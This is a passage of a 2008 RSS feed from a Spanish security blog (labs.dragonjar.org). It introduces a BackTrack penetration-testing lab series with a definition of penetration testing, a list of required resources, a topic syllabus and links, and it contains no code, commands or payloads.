Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://backtrack.offensive-security.com/index.php?title=Tools" target="_blank"><strong>Lista de herramientas incluídas en BackTrack</strong></a></p>
<p style="text-align: justify;">El proceso de instalación o puesta en marcha de este LiveCD es un tema que ya ha sido cubierto en diferentes ocasiones en Labs DragonJAR. Veamos algunos enlaces de como llevar a cabo este procedimiento:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i" target="_blank"><strong>Ejecución / Instalación de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://www.dragonjar.org/backtrack-portable.xhtml" target="_blank"><strong>BackTrack Portable</strong></a></p>
<p style="text-align: justify;"><a href="http://hwagm.elhacker.net/htm/backtrack.htm" target="_blank"><strong>Instalar Back | Track en el HD de tú PC</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack-usb" target="_blank"><strong>Instalar BackTrack en una llave USB</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack" target="_blank"><strong>Review BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://kernelpanic.org.mx/2008/07/como-instalar-backtrack-3/" target="_blank"><strong>Como Instalar Back|Track 3</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Contenido y Recursos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 15:59:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[ARP]]></category>
		<category><![CDATA[fuzzing]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Redirección]]></category>
		<category><![CDATA[spoofing]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Troyanos]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=211</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Para este nuevo recurso se hacen necesarios los siguiente elementos:</p>
<ol style="text-align: justify;">
<li><a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd" target="_blank">Imágen ISO</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb" target="_blank">LiveCD USB</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm" target="_blank">Appliance</a> de <strong><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">BackTrack</a></strong></li>
<li>Software de virtualización (<a href="http://www.vmware.com/lasp/products/ws/" target="_blank">VMWare WorkStation</a>, <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a>, <a href="http://es.wikipedia.org/wiki/QEMU" target="_blank">Qemu</a>, <a href="http://www.xoftwarelibre.org/virtualbox-ose-software-libre-para-virtualizacion" target="_blank">Virtual BOX</a>, <a href="http://www.xoftwarelibre.org/moka5-virtualizacion-libre-al-instante" target="_blank">MOKA5</a>, etc.)</li>
<li>PC de mediana capacidad.</li>
<li>Conexión a internet (algunos ejercicios, referencias)</li>
</ol>
<p style="text-align: justify;"><span id="more-211"></span><strong>Contenido temático:</strong></p>
<ol style="text-align: justify;">
<li>Conceptos básicos de BackTrack</li>
<li>Servicios básicos (DHCP, IP, Apache, SSHD, Tftp, VNC)</li>
<li>Entorno básico Bash</li>
<li>NetCat</li>
<li>Wireshark</li>
<li>Nmap</li>
<li>Técnicas de recolección de información</li>
<li>Recursos Web</li>
<li>Reconocimiento DNS</li>
<li>Reconocimiento SNMP</li>
<li>Reconocimiento SMTP</li>
<li>Recolección de información Microsoft Netbios</li>
<li>Escaneo de puertos</li>
<li>ARP Spoofing</li>
<li>Explotación de Buffer overflow en Windows</li>
<li>Fuzzing</li>
<li>Trabajando con Exploits</li>
<li>Transferencia de archivos</li>
<li>Frameworks de explotación</li>
<li>Ataques del lado del cliente</li>
<li>Redirección</li>
<li>Ataques a contraseñas</li>
<li>Vectores de ataques a aplicaciones Web</li>
<li>Troyanos</li>
<li>NTFS Alternate Data Streams</li>
<li>Rootkits</li>
</ol>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL" target="_blank">SQL Injection</a>, <a href="http://es.wikipedia.org/wiki/Caballo_de_Troya_(inform%C3%A1tica)" target="_blank">Troyanos</a>, <a href="http://www.dragonjar.org/anti-rootkit" target="_blank">RootKits</a>, <a href="http://www.ignaciomarcos.com.ar/index.php/2007/02/27/alternate-data-streams/" target="_blank">NTFS Alternate Data Streams</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Fuerza Bruta</a>, <a href="http://es.wikipedia.org/wiki/Redireccionamiento_de_puertos" target="_blank">Redirección</a>, <a href="http://www.trancek.es/2007/10/fuzzing-brute-force-vulnerability.html" target="_blank">Fuzzing</a>, <a href="http://es.wikipedia.org/wiki/Spoofing" target="_blank">Spoofing</a>, <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a>, <a href="http://es.wikipedia.org/wiki/Bash" target="_blank">Bash</a>, <a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a>.</p>
<p style="text-align: justify;">Este nuevo recurso estará basado en el sistema de entrenamiento ofrecido por los propios desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Test de Penetración con BackTrack, Introducción</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion#comments</comments>
		<pubDate>Wed, 20 Aug 2008 16:33:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Ataques]]></category>
		<category><![CDATA[Distribución]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=203</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes de comenzar con este nuevo recurso y que irá en paralelo con otros laboratorios en desarrollo (<a href="http://labs.dragonjar.org/category/hacking" target="_blank">Laboratorios- Hacking, Técnicas y contramedidas</a>, <a href="http://labs.dragonjar.org/category/hacktaller" target="_blank">DragoNLab-HackTaller</a> y <a href="http://labs.dragonjar.org/category/criptografia" target="_blank">Taller Técnicas Criptográficas</a>), es necesarios aclarar algunos conceptos sobre el mismo.<br />
No sería posible comenzar sin aclarar la finalidad de este laboratorio práctico, las herramientas necesarias y la terminología a utilizar.</p>
<p style="text-align: justify;">Comencemos entonces por definir los conceptos de <strong>Test de Penetración</strong> y <strong>BackTrack</strong>:</p>
<p style="text-align: justify;"><span id="more-203"></span><strong>Test de penetración:</strong><br />
Test de Penetración, también llamado a veces “hacking ético” es una evaluación activa de las medidas de seguridad de la información.<br />
En los entornos de red complejos actuales, la exposición potencial al riesgo es cada vez mayor y securizar los sistemas se convierten en un auténtico reto.<br />
A través del Test de Penetración es posible detectar el nivel de Seguridad Interna y Externa de los Sistemas de Información de la empresa, determinando el grado de acceso que tendría un atacante con intenciones maliciosas. Además, el servicio chequea las vulnerabilidades que pueden ser vistas y explotadas por individuos no autorizados, &#8220;crackers&#8221;, agentes de información, ladrones, antiguos empleados, competidores, etc.</p>
<p style="text-align: justify;"><strong>Los servicios de Test de Penetración permiten:</strong><br />
<strong>-</strong> Evaluar vulnerabilidades por medio de la identificación de debilidades de configuración que puedan ser explotadas.<br />
<strong>-</strong> Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.<br />
<strong>-</strong> Proveer recomendaciones prioritizadas para mitigar y eliminar las debilidades.</p>
<p style="text-align: justify;">El Test de Penetración está dirigido a la búsqueda de agujeros de seguridad de forma focalizada en uno o varios recursos críticos, como puede ser el firewall o el servidor Web.</p>
<p style="text-align: justify;"><strong>BackTrack:</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.<br />
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;">Luego de tener claro las anteriores definiciones podemos entender que la finalidad de nuestro Laboratorio de Test de Penetración con BackTrack, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p style="text-align: justify;">Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://www.microsoft.com/spain/empresas/legal/forensic.mspx" target="_blank">análisis forense</a>, <a href="http://es.wikipedia.org/wiki/Comunicaci%C3%B3n_inal%C3%A1mbrica" target="_blank">Wireless</a>.</p>
<p style="text-align: justify;">En el próximo Laboratorio, definiré los recursos necesarios y el contenido temático del Laboratorio.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>

